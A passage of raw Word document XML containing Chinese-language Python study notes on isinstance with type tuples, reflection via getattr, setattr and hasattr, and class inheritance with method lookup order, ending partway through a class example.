      <w:bookmarkStart w:id="414" w:name="_Toc159779865"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型判断</w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w14:paraId="253DB835" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD08772" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isinstance()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8F11D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个参数不仅可以只写一个类型，也可以是一个迭代的类型列表对象，如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876B111" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>isinstance(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C739040" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        type_,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871AE23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3221BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLScalarType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A457C99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLObjectType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9B5C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLInterfaceType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E5B1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLUnionType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A7BF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLEnumType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42AC69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLInputObjectType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD37C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLList,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0811E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            GraphQLNonNull,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456107F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C3DC9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F32BE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E837F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBCC259" w14:textId="679C6DFB" w:rsidR="008D2AF4" w:rsidRDefault="008D2AF4" w:rsidP="008D2AF4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01769823" w14:textId="77777777" w:rsidR="008D2AF4" w:rsidRDefault="008D2AF4" w:rsidP="008D2AF4"/>
    <w:p w14:paraId="18D25790" w14:textId="0E83362B" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取对象的属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C758348" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>class MyClass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A1D53" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783CD85" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t xml:space="preserve">        self.a = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76705562" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t xml:space="preserve">        self.b = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E888A49" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="672DEBC2" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>obj = MyClass()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA5820" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>attr_name = 'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3BDFB" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>value = getattr(obj, attr_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C37C6" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(value)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA1B06" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="7B648EDA" w14:textId="3D5F5D18" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置对象的属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC93EEC" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="7AFBAFAE" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>setattr(obj, 'a', 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F9A34" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(obj.a)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A91E4E1" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="341B7743" w14:textId="038BC644" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="0090087C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用对象的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E4364" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>def my_method(self, x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC0F80" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t xml:space="preserve">    return self.a + x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B4F82" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="3CC5F5EF" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>setattr(MyClass, 'my_method', my_method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178A526" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>result = obj.my_method(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6455AE" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(result)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D1514" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7"/>
    <w:p w14:paraId="1037DADE" w14:textId="33DAE88D" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查对象是否具有某个属性或方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A9E69" w14:textId="77777777" w:rsidR="00DA21B7" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:t>has_attr = hasattr(obj, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DD220" w14:textId="127BF40B" w:rsidR="008D2AF4" w:rsidRPr="008D2AF4" w:rsidRDefault="00DA21B7" w:rsidP="00DA21B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(has_attr)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A243B" w14:textId="77777777" w:rsidR="008D2AF4" w:rsidRDefault="008D2AF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DDE14F" w14:textId="77777777" w:rsidR="008D2AF4" w:rsidRDefault="008D2AF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3377A792" w14:textId="77777777" w:rsidR="008D2AF4" w:rsidRDefault="008D2AF4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB748DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc159779866"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>类的继承与派生</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w14:paraId="4872E2D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/cityzenoldwang/article/details/78336992</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A74E715" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D20B6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承及调用父类魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D9670" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>需要注意圆括号中父级类的顺序，若是父级类中有相同的方法名，而在</w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:tgtFrame="https://blog.csdn.net/cityzenoldwang/article/details/_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FC5531"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>子类</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用时未指定，python从左至右搜索 即方法在子类中未找到时，从左到右查找父级类中是否包含方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E511CED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CFB2ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C 继承了 A 和 B，C 称为 A，B 的派生类，C 可以直接获取 A 和 B 里面定义的所有方法和变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FE745" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>派生类在寻找变量和方法的时候，优先寻找自身的方法和变量，最后在去继承的类里面去寻找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34280C3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类自身的 __init__ 方法不会被其他类调用。但是可以调用。参考继承示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A9FFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class A(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38884AE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD8CC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFD9AFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class B(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F8B57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01619F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560AE282" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class C(A, B):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA07595" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBC598" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C684AC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果希望继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__init__(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际上可以认为不可继承，但是实际上可以调用父类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0809D086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>定义基本类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B914D70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>class people():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054BAB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>定义基本属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B25FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D4741" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    age = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE37B7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>定义私有属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>私有属性在类外部无法直接进行访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504E2B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    __weight = 0</w:t>
      </w:r>
    </w:p>
